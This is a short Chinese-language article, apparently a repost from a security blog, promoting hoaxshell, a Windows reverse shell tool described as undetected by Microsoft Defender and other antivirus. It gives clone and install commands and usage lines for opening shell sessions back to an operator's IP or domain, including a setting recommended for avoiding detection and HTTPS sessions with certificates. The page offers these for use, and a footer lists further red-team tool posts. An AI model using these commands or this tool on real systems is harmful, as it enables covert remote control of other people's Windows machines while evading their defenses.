Windows反向shell -- hoaxshell
2023-4-3 08:10:10 Author: 系统安全运维(查看原文) 阅读量:19 收藏

0x01 工具介绍

hoaxshell 是一种非常规的 Windows 反向 shell,目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到,因为它完全基于 http(s) 流量。该工具易于使用,它生成自己的 PowerShell 有效负载并支持加密 (ssl)。

0x02 安装与使用

1、安装需要的库文件

git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py

2、通过 http 的基本 shell 会话

sudo python3 hoaxshell.py -s <your_ip>

3、避免检测的推荐用法(通过 http)

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

4、加密的 shell 会话 (https)

# Generate self-signed certificate:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

5、具有可信证书的加密 shell 会话

sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

6、抓取会话模式

sudo python3 hoaxshell.py -s <your_ip> -g

0x03 下载地址

项目地址:https://github.com/t3l3machus/hoaxshell

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247519243&idx=1&sn=4b530a6d5e1af7f191adc4d82291ea4e&chksm=c3085f7bf47fd66d212f1f3d7bc8f10ee4025a21aa8bca10892cf77ccdfc12453b152043593d#rd
如有侵权请联系:admin#unsafe.sh